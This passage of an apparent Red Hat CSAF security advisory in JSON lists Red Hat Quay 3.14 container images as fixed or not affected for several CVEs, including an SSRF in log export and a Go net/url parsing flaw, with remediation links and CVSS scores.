          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-2377"
        },
        {
          "category": "external",
          "summary": "RHBZ#2439201",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439201"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-2377",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2377"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2377",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2377"
        }
      ],
      "release_date": "2026-04-08T16:18:10.324000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality"
    },
    {
      "cve": "CVE-2026-4427",
      "discovery_date": "2026-03-18T14:02:19.414820+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "No description is available for this CVE.",
          "title": "Vulnerability description"
        },
        {
          "category": "other",
          "text": "This CVE has been marked as Rejected by the assigning CNA.",
          "title": "Statement"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4427"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4427",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4427"
        }
      ],
      "release_date": "2026-03-18T13:00:31+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "title": "github.com/jackc/pgproto3: pgproto3: Denial of Service via negative field length in DataRow message"
    },
    {
      "cve": "CVE-2026-25679",
      "cwe": {
        "id": "CWE-1286",
        "name": "Improper Validation of Syntactic Correctness of Input"
      },
      "discovery_date": "2026-03-06T22:02:11.567841+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445356"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "net/url: Incorrect parsing of IPv6 host literals in net/url",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
